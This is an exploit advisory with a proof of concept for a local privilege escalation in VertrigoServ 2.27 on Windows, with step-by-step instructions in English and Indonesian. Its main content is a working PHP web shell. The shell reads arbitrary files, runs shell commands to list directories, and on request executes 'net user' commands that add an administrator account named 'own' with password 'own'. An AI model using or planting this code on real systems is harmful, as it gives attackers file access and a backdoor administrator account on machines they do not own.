===================================================== Vertrigoserv 2.27 Local Privilege Escalation Exploit ==================================================== :-------------------------------------------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Vertrigoserv 2.27 Local Privilege Escalation Exploit : # Date : May 19th 2012 : # Author : X-Cisadane : # Software Link : http://vertrigo.sourceforge.net/ : # Version : 2.27 : # Category : Desktop (Windows) Applications : # Platform : Win32 : # Vulnerability : Local Privilege Escalation Exploit : # Tested On : Windows XP Professional Service Pack 3 : # Greetz to : Inphex, X-Code, Borneo Crew, Depok Cyber, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari :-------------------------------------------------------------------------------------------------------------------------------------------------------------------------: Proof Of Concept : ================ [ENGLISH] 1.Run VertrigoServ 2.Create a file named script.php in X:\VertrigoServ Installation Directory\www\ 3.Fill script.php with this script & save! <?php //I'm using code from Inphex (inphex0 at googlemail.com) //Copyrighted (C) Inphex error_reporting(E_ALL ^ E_NOTICE); $qQa = ($_GET['qmB'] == "")?"./":$_GET['qmB']; $qQd = opendir($qQa); if (isset($_GET['qrF'])) { $qrX = fopen($_GET['qrF'],"r"); echo fread($qrX,50000); exit; } elseif(isset($_GET['qQx'])) { exec("net user own own /add & net localgroup Administrators own /add"); echo "User own -> full privileges successfully added";exit;} echo "<textarea rows=40 cols=80 style='position:absolute;margin-left:390;'>"; echo htmlspecialchars(shell_exec("cd ".$qQa." & dir")); echo "</textarea>"; while (false !== ($qQr = readdir($qQd))){ switch(filetype($qQa.$qQr)) { case "dir": echo "<a href=?qmB=".urlencode(htmlspecialchars(realpath($qQa.$qQr)))."/>".htmlspecialchars($qQr)."</a><br>"; break; case "file": echo "<a href=?qrF=".urlencode(htmlspecialchars(realpath($qQa.$qQr))).">".htmlspecialchars($qQr)."</a><br>"; break; } } ?> 4.Open your browser & go to http://localhost/script.php?qQx 5.If successfull, it will show this message : User own -> full privileges successfully added 6.Now, open Command Prompt and type Net User then press enter! It will show a new user (own) & the password is own. [INDONESIAN] 1.Jalankan VertrigoServ 2.Buat sebuah berkas dengan nama script.php pada X:\Direktori tempat menginstall VertrigoServ\www\ 3.Isi berkas script.php dengan script berikut & simpan! 4.Buka browser anda, masuk ke http://localhost/script.php?qQx 5.Jika berhasil, akan muncul pesan ini User own -> full privileges successfully added 6.Sekarang buka Command Prompt dan ketik Net User kemudian tekan enter! Kemudian akan muncul sebuah user baru dengan nama own dan password own